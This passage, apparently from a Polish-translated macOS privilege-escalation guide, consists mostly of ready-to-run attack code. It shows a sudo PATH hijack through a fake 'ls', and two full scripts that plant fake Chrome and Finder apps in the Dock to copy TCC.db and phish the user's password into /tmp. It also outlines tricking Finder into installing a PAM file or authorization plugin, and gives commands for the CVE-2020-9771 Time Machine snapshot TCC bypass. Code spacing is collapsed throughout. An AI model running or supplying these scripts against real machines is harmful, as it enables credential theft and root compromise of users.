However, macOS utrzymujePATH użytkownika, gdy wykonuje sudo. Co oznacza, że innym sposobem na przeprowadzenie tego ataku byłoby przejęcie innych binarek, które ofiara nadal wykona podczas uruchamiania sudo:
# Let's hijack ls in /opt/homebrew/bin, as this is usually already in the users PATHcat>/opt/homebrew/bin/ls<<EOF#!/bin/bashif [ "\$(id -u)" -eq 0 ]; thenwhoami > /tmp/privescfi/bin/ls "\$@"EOFchmod+x/opt/homebrew/bin/ls# victimsudols
Note that a user that uses the terminal will highly probable have Homebrew installed. So it's possible to hijack binaries in /opt/homebrew/bin.
Dock Impersonation
Using some social engineering you could impersonate for example Google Chrome inside the dock and actually execute your own script:
Some suggestions:
Check in the Dock if there is a Chrome, and in that case remove that entry and add the fakeChrome entry in the same position in the Dock array.
#!/bin/sh# THIS REQUIRES GOOGLE CHROME TO BE INSTALLED (TO COPY THE ICON)# If you want to removed granted TCC permissions: > delete from access where client LIKE '%Chrome%';rm-rf/tmp/Google\ Chrome.app/2>/dev/null# Create App structuremkdir-p/tmp/Google\ Chrome.app/Contents/MacOSmkdir-p/tmp/Google\ Chrome.app/Contents/Resources# Payload to executecat>/tmp/Google\ Chrome.app/Contents/MacOS/Google\ Chrome.c<<EOF#include <stdio.h>#include <stdlib.h>#include <unistd.h>int main() {char *cmd = "open /Applications/Google\\\\ Chrome.app & ""sleep 2; ""osascript -e 'tell application \"Finder\"' -e 'set homeFolder to path to home folder as string' -e 'set sourceFile to POSIX file \"/Library/Application Support/com.apple.TCC/TCC.db\" as alias' -e 'set targetFolder to POSIX file \"/tmp\" as alias' -e 'duplicate file sourceFile to targetFolder with replacing' -e 'end tell'; ""PASSWORD=\$(osascript -e 'Tell application \"Finder\"' -e 'Activate' -e 'set userPassword to text returned of (display dialog \"Enter your password to update Google Chrome:\" default answer \"\" with hidden answer buttons {\"OK\"} default button 1 with icon file \"Applications:Google Chrome.app:Contents:Resources:app.icns\")' -e 'end tell' -e 'return userPassword'); ""echo \$PASSWORD > /tmp/passwd.txt";system(cmd);return 0;}EOFgcc/tmp/Google\ Chrome.app/Contents/MacOS/Google\ Chrome.c-o/tmp/Google\ Chrome.app/Contents/MacOS/Google\ Chromerm-rf/tmp/Google\ Chrome.app/Contents/MacOS/Google\ Chrome.cchmod+x/tmp/Google\ Chrome.app/Contents/MacOS/Google\ Chrome# Info.plistcat<<EOF>/tmp/Google\ Chrome.app/Contents/Info.plist<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN""http://www.apple.com/DTDs/PropertyList-1.0.dtd"><plist version="1.0"><dict><key>CFBundleExecutable</key><string>Google Chrome</string><key>CFBundleIdentifier</key><string>com.google.Chrome</string><key>CFBundleName</key><string>Google Chrome</string><key>CFBundleVersion</key><string>1.0</string><key>CFBundleShortVersionString</key><string>1.0</string><key>CFBundleInfoDictionaryVersion</key><string>6.0</string><key>CFBundlePackageType</key><string>APPL</string><key>CFBundleIconFile</key><string>app</string></dict></plist>EOF# Copy icon from Google Chromecp/Applications/Google\ Chrome.app/Contents/Resources/app.icns/tmp/Google\ Chrome.app/Contents/Resources/app.icns# Add to Dockdefaultswritecom.apple.dockpersistent-apps-array-add'<dict><key>tile-data</key><dict><key>file-data</key><dict><key>_CFURLString</key><string>/tmp/Google Chrome.app</string><key>_CFURLStringType</key><integer>0</integer></dict></dict></dict>'sleep0.1killallDock
Kilka sugestii:
Nie możesz usunąć Findera z Docka, więc jeśli zamierzasz go dodać do Docka, możesz umieścić fałszywego Findera tuż obok prawdziwego. W tym celu musisz dodać fałszywy wpis Findera na początku tablicy Docka.
Inną opcją jest nie umieszczanie go w Docku i po prostu otwarcie go, "Finder prosi o kontrolę Findera" nie jest takie dziwne.
Inną opcją na eskalację do roota bez pytania o hasło za pomocą okropnego okna, jest sprawienie, aby Finder naprawdę poprosił o hasło do wykonania uprzywilejowanej akcji:
Poproś Findera o skopiowanie do /etc/pam.d nowego pliku sudo (Okno z prośbą o hasło wskaże, że "Finder chce skopiować sudo")
Poproś Findera o skopiowanie nowego Pluginu Autoryzacji (Możesz kontrolować nazwę pliku, aby okno z prośbą o hasło wskazało, że "Finder chce skopiować Finder.bundle")
#!/bin/sh# THIS REQUIRES Finder TO BE INSTALLED (TO COPY THE ICON)# If you want to removed granted TCC permissions: > delete from access where client LIKE '%finder%';rm-rf/tmp/Finder.app/2>/dev/null# Create App structuremkdir-p/tmp/Finder.app/Contents/MacOSmkdir-p/tmp/Finder.app/Contents/Resources# Payload to executecat>/tmp/Finder.app/Contents/MacOS/Finder.c<<EOF#include <stdio.h>#include <stdlib.h>#include <unistd.h>int main() {char *cmd = "open /System/Library/CoreServices/Finder.app & ""sleep 2; ""osascript -e 'tell application \"Finder\"' -e 'set homeFolder to path to home folder as string' -e 'set sourceFile to POSIX file \"/Library/Application Support/com.apple.TCC/TCC.db\" as alias' -e 'set targetFolder to POSIX file \"/tmp\" as alias' -e 'duplicate file sourceFile to targetFolder with replacing' -e 'end tell'; ""PASSWORD=\$(osascript -e 'Tell application \"Finder\"' -e 'Activate' -e 'set userPassword to text returned of (display dialog \"Finder needs to update some components. Enter your password:\" default answer \"\" with hidden answer buttons {\"OK\"} default button 1 with icon file \"System:Library:CoreServices:Finder.app:Contents:Resources:Finder.icns\")' -e 'end tell' -e 'return userPassword'); ""echo \$PASSWORD > /tmp/passwd.txt";system(cmd);return 0;}EOFgcc/tmp/Finder.app/Contents/MacOS/Finder.c-o/tmp/Finder.app/Contents/MacOS/Finderrm-rf/tmp/Finder.app/Contents/MacOS/Finder.cchmod+x/tmp/Finder.app/Contents/MacOS/Finder# Info.plistcat<<EOF>/tmp/Finder.app/Contents/Info.plist<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN""http://www.apple.com/DTDs/PropertyList-1.0.dtd"><plist version="1.0"><dict><key>CFBundleExecutable</key><string>Finder</string><key>CFBundleIdentifier</key><string>com.apple.finder</string><key>CFBundleName</key><string>Finder</string><key>CFBundleVersion</key><string>1.0</string><key>CFBundleShortVersionString</key><string>1.0</string><key>CFBundleInfoDictionaryVersion</key><string>6.0</string><key>CFBundlePackageType</key><string>APPL</string><key>CFBundleIconFile</key><string>app</string></dict></plist>EOF# Copy icon from Findercp/System/Library/CoreServices/Finder.app/Contents/Resources/Finder.icns/tmp/Finder.app/Contents/Resources/app.icns# Add to Dockdefaultswritecom.apple.dockpersistent-apps-array-add'<dict><key>tile-data</key><dict><key>file-data</key><dict><key>_CFURLString</key><string>/tmp/Finder.app</string><key>_CFURLStringType</key><integer>0</integer></dict></dict></dict>'sleep0.1killallDock
TCC - Eskalacja uprawnień roota
CVE-2020-9771 - obejście TCC mount_apfs i eskalacja uprawnień
Każdy użytkownik (nawet nieuprzywilejowany) może utworzyć i zamontować migawkę Time Machine oraz uzyskać dostęp do WSZYSTKICH plików tej migawki.
Jedynym wymaganym przywilejem jest to, aby aplikacja używana (taka jak Terminal) miała dostęp Full Disk Access (FDA) (kTCCServiceSystemPolicyAllfiles), który musi być przyznany przez administratora.
# Create snapshottmutillocalsnapshot# List snapshotstmutillistlocalsnapshots/Snapshotsfordisk/:com.apple.TimeMachine.2023-05-29-001751.local# Generate folder to mount itcd/tmp# I didn it from this foldermkdir/tmp/snap# Mount it, "noowners" will mount the folder so the current user can access everything/sbin/mount_apfs-onoowners-scom.apple.TimeMachine.2023-05-29-001751.local/System/Volumes/Data/tmp/snap# Access itls/tmp/snap/Users/admin_user# This will work
